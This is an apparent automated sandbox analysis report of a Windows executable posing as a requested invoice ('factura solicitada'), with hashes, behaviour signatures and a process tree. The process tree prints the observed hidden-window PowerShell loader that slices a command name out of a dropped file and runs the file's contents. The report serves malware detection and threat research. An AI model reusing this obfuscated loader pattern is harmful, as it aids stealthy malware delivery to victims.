Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17/02/2025, 12:00
Static task
static1
Behavioral task
behavioral1
Sample
factura solicitada..exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
factura solicitada..exe
Resource
win10v2004-20250207-en
Behavioral task
behavioral3
Sample
Concludence.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Concludence.ps1
Resource
win10v2004-20250211-en
General
-
Target
factura solicitada..exe
-
Size
493KB
-
MD5
6124034fe55707e3ec7a9940b36a2640
-
SHA1
fa817c784d46fdcfc065a264713c82f5f53b7288
-
SHA256
aa928f80e184381e6cb9e2a8e159334e3494999165cf97bcd71bdfbb61dce2bf
-
SHA512
6ea1a6caddac4f0696731f42a726a5df960aed0452aa347348805ee46f7e381be1fe4feeb6f79fa01883c248e99190a106e026973eb4dd93ca008605c6e8169e
-
SSDEEP
12288:sUatc/gP29iwihJafg1LUBCLousN3fjAmBmwG:sUatj2MhAB73fjAAmwG
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2792 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language factura solicitada..exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3048 wrote to memory of 2792 3048 factura solicitada..exe 30 PID 3048 wrote to memory of 2792 3048 factura solicitada..exe 30 PID 3048 wrote to memory of 2792 3048 factura solicitada..exe 30 PID 3048 wrote to memory of 2792 3048 factura solicitada..exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\factura solicitada..exe"C:\Users\Admin\AppData\Local\Temp\factura solicitada..exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Trafikerer=Get-Content -Raw 'C:\Users\Admin\AppData\Local\unproselyte\besparelses\Concludence.Cha';$Superego=$Trafikerer.SubString(52777,3);.$Superego($Trafikerer) "2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-